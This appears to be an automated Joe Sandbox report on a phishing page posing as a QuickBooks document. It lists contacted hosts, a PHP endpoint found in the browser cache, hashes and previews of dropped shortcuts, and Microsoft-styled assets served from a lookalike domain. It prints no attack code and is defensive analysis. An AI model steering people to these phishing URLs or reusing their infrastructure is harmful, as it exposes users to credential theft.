https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/favicon.ico	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://abordares.com/quicky/df.php	chromecache_71.2.dr	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.17.24.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
104.18.3.35	pub-778c9922a88c4d2c839b01025172bb0b.r2.dev	United States	13335	CLOUDFLARENETUS	false
64.233.177.99	www.google.com	United States	15169	GOOGLEUS	false
199.36.158.100	cdn-jm-tools.web.app	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
13.107.213.41	part-0013.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

Private

IP
192.168.2.5

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1427103
Start date and time:	2024-04-17 01:36:49 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.html
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.phis.win@16/29@10/7
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 64.233.176.94, 172.253.124.139, 172.253.124.113, 172.253.124.138, 172.253.124.102, 172.253.124.101, 172.253.124.100, 172.253.124.84, 34.104.35.123, 142.251.15.95, 74.125.136.95, 108.177.122.95, 142.250.105.95, 74.125.138.95, 172.217.215.95, 64.233.177.95, 172.253.124.95, 173.194.219.95, 64.233.185.95, 142.250.9.95, 40.68.123.157, 72.21.81.240, 192.229.211.108, 13.85.23.206, 52.165.164.15, 172.217.215.94
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, wu.azureedge.net, clients2.google.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, aadcdnoriginwus2.azureedge.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, aadcdn.msauth.net, wu-bg-shim.trafficmanager.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.html

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 16 22:37:38 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.978087372045732
Encrypted:	false
SSDEEP:	48:8Ud0T4sBH8idAKZdA19ehwiZUklqehGy+3:87PUdy
MD5:	820192A770A7FA877AAA0E66C2C9C1C7
SHA1:	9485380D7740D41B617FAF5C6617DF7441E09E24
SHA-256:	D95852765218A8771B4ACD3AA9C7409DBDD059320438B7B021421350FDF64CEA
SHA-512:	626D86F059FABD8D0F4E412E5F5E96913DE2DDAE0CF0E9F91F612C9682340E7820795ABA80CAFAE92D3961CD81B85ADAA40A4D18D1B43F91ABC9D28B614238AC
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,........W...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............5.Z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 16 22:37:38 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9978263803333274
Encrypted:	false
SSDEEP:	48:8Ctd0T4sBH8idAKZdA1weh/iZUkAQkqehNy+2:8CUPm9QQy
MD5:	48FEA753CDAF321FF5FAD2BC6842DE19
SHA1:	D902E497332D9C8B7A931ED64DEED09CABFFD521
SHA-256:	6757BC6129398189654CD5C4B1857B0FE081AA67132491E2FD8ADB66CF8011C1
SHA-512:	466C0E52B261C3598A50F9B54D9911671E9B8BA5D2E55CAA89C9CF61BC263266C0FE16FB33430E94177713E76ECAE0FB00A32AFC95B65C7905259897A6DD8905
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....J..W...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............5.Z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.009058499582572
Encrypted:	false
SSDEEP:	48:8xtd0T4ssH8idAKZdA14tseh7sFiZUkmgqeh7sHy+BX:8xUPpnxy
MD5:	765BF134BD39C266A0D05914D5D1E9D5
SHA1:	10DE7D15076EB1033968B52635F5B6F0D95C20EF
SHA-256:	131EAF0806C1446B0E0CC6EF42E01B3E1D3A6B4C2725060E025C3F7AC867B3B3
SHA-512:	A41B01E0C688D55479DCDB3BBFDBB634E56CC41651B206EAEC67B4F49A3738AD391012D92950802FEF2EFD6F672A40C03875A4DB079036333E4244E3285B73FD
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............5.Z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 16 22:37:38 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9960598074088867
Encrypted:	false
SSDEEP:	48:8Pd0T4sBH8idAKZdA1vehDiZUkwqehJy+R:8GPtfy
MD5:	47072B0A7400A5B8582AED2FEA02155B
SHA1:	CBFFA38D0E6E63DDAF18A5FFD6D18B4D071EDD03
SHA-256:	A8E530AF3207270BD2DEE41A35EC0C716C7231475BAFC47A776A3CC3193B0B83
SHA-512:	54A184684F068533813B42397DC9B435DC934A8BFCB5802879BD40524C71227A32DB7014E3813EA0E1332C74D40334BB2A08DCB9AF9D83DADF666C125D852342
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....Z..W...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............5.Z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 16 22:37:38 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9849884311184107
Encrypted:	false
SSDEEP:	48:8fd0T4sBH8idAKZdA1hehBiZUk1W1qehLy+C:8WPt9ry
MD5:	28DAC12818793E11FC9AE469E903185D
SHA1:	AC0FD43BD00680BC2FE6FD81B37F2DB8F266A786
SHA-256:	231BB59FAF47EB3BC642A89B50E71CB7982D2EAA4E01A556C9A4255D86B4FEE6
SHA-512:	1BD859B1B716179CC41627E2BBE46E1CB6358A3C0120E0BE0D4C352129C939FC098109D2BCE4704698414D6F842BEF79DBE6C0EA877DBDF65A3B1CDAA1F49EBA
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....O...W...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............5.Z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 16 22:37:38 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.9957117344401785
Encrypted:	false
SSDEEP:	48:8gd0T4sBH8idAKZdA1duT+ehOuTbbiZUk5OjqehOuTbxy+yT+:8fPxT/TbxWOvTbxy7T
MD5:	DA737FB6AE4B313CAFF8A6B44B6A7C59
SHA1:	D18DA260B530E6D3A473E89A3ADB24C8A75923E1
SHA-256:	5606AC4611EBF339E427621EB1479D137D455E22DBDC36E1446F1D3C18A2BB76
SHA-512:	6DE6E4EEB70148FFECDFDAA2C1B8239FB0C7C1F9B34682249F5A05A8D5E736308EC5942B8666CC9ECE43B33C3430EE4A18A21207CE5A8708B3279374EC0B12C1
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,..... ..W...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............5.Z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 64

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	dropped
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	low
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 65

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	915
Entropy (8bit):	3.8525277758130154
Encrypted:	false
SSDEEP:	24:t4CvnAVRfFArf1QqCSzGUdiHTVtpRduf1QqCWbVHTVeUV0Uv6f1QqCWbVHTVeUVx:fn1r1QqC4GuiHFXS1QqCWRHQ3V1QqCWz
MD5:	2B5D393DB04A5E6E1F739CB266E65B4C
SHA1:	6A435DF5CAC3D58CCAD655FE022CCF3DD4B9B721
SHA-256:	16C3F6531D0FA5B4D16E82ABF066233B2A9F284C068C663699313C09F5E8D6E6
SHA-512:	3A692635EE8EBD7B15930E78D9E7E808E48C7ED3ED79003B8CA6F9290FA0E2B0FA3573409001489C00FB41D5710E75D17C3C4D65D26F9665849FB7406562A406
Malicious:	false
Reputation:	low
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><title>assets</title><path fill="#777777" d="M1.143,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.107,1.107,0,0,1-.446.089A1.107,1.107,0,0,1,.7,9.054a1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893A1.164,1.164,0,0,1,.7,6.946a1.107,1.107,0,0,1,.446-.089M8,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,8,6.857m6.857,0a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,14.857,6.857Z"/></svg>

Chrome Cache Entry: 66

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (61112)
Category:	downloaded
Size (bytes):	102041
Entropy (8bit):	5.301013942919482
Encrypted:	false
SSDEEP:	1536:IpHDgWeWJw+k4zazA/PWrF7qvEAFiQcpmeh1+zy35o:ORUyy3+
MD5:	53B33B15CF9DFF288EDA12099E0EE746
SHA1:	1748B7BD3B89B84D800374083AF646FEC11FF082
SHA-256:	30C90EA15DDEEC7D675ED3EAAF26E8283B908265C5A6A5FF00345D03C24233F0
SHA-512:	8BA4BCBE63B72E6DFF001B441D0FE100ECB3A6A6D664816EAC7D89E8BB088C6653C9F7BC646F20884842C19C7516ED751332E4585FF49202D4B3F73E6438F24D
Malicious:	false
Reputation:	low
URL:	https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/Converged_v21033_U7M7Fc-d_yiO2hIJng7nRg2.css
Preview:	/! Copyright (C) Microsoft Corporation. All rights reserved. /./*!.------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------..This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise...//-----------------------------------------------------------------------------.twbs-bootstrap-sass (3.3.0).//-----------------------------------------------------------------------------..The MIT License (MIT)..Copyright (c) 2013 Twitter, Inc..Permission is hereby granted, free of charge, to any perso

Chrome Cache Entry: 67

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	240
Entropy (8bit):	6.583238701216054
Encrypted:	false
SSDEEP:	6:6v/lhPZJkta+R80rWRNtlQQz6fl4sfiadl/jp:6v/77t5NJIlhfL/N
MD5:	7CC096DA6AA2DBA3F81FCC1C8262157C
SHA1:	A50776316F0220ED7CD7882A68C742A8861C999D
SHA-256:	AB50358475ADAE73A435466C72D1A48AB124E8AE06614663716A46DCE5AC8B83
SHA-512:	EC046758EC2D6588B9B103E5BB1B035DEE57DFBB068AD902C869ED22B14F78282461709BDB20366EE887B814F00AE39A4EBD82DB42BD831BE85FE5B4BF4037AF
Malicious:	false
Reputation:	low
URL:	https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png
Preview:	.PNG........IHDR..............w=.....pHYs...........~.....IDATH....@.......: !D.%.@%..>(...4@FHND.Gj.l.'.I ....h?.&.D.......$...R.z.....`.........#...a..8@3.z.=...3X...X.L.;....v`.....p.t..DI&w.I.pA&9..F........Z.FG<&.:9.....IEND.B`.

Chrome Cache Entry: 68

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	915
Entropy (8bit):	3.8525277758130154
Encrypted:	false
SSDEEP:	24:t4CvnAVRfFArf1QqCSzGUdiHTVtpRduf1QqCWbVHTVeUV0Uv6f1QqCWbVHTVeUVx:fn1r1QqC4GuiHFXS1QqCWRHQ3V1QqCWz
MD5:	2B5D393DB04A5E6E1F739CB266E65B4C
SHA1:	6A435DF5CAC3D58CCAD655FE022CCF3DD4B9B721
SHA-256:	16C3F6531D0FA5B4D16E82ABF066233B2A9F284C068C663699313C09F5E8D6E6
SHA-512:	3A692635EE8EBD7B15930E78D9E7E808E48C7ED3ED79003B8CA6F9290FA0E2B0FA3573409001489C00FB41D5710E75D17C3C4D65D26F9665849FB7406562A406
Malicious:	false
Reputation:	low
URL:	https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><title>assets</title><path fill="#777777" d="M1.143,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.107,1.107,0,0,1-.446.089A1.107,1.107,0,0,1,.7,9.054a1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893A1.164,1.164,0,0,1,.7,6.946a1.107,1.107,0,0,1,.446-.089M8,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,8,6.857m6.857,0a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,14.857,6.857Z"/></svg>

Chrome Cache Entry: 69

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	low
URL:	https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/favicon.ico
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 70

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
Category:	dropped
Size (bytes):	673
Entropy (8bit):	7.6596900876595075
Encrypted:	false
SSDEEP:	12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
MD5:	0E176276362B94279A4492511BFCBD98
SHA1:	389FE6B51F62254BB98939896B8C89EBEFFE2A02
SHA-256:	9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
SHA-512:	8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
Malicious:	false
Reputation:	low
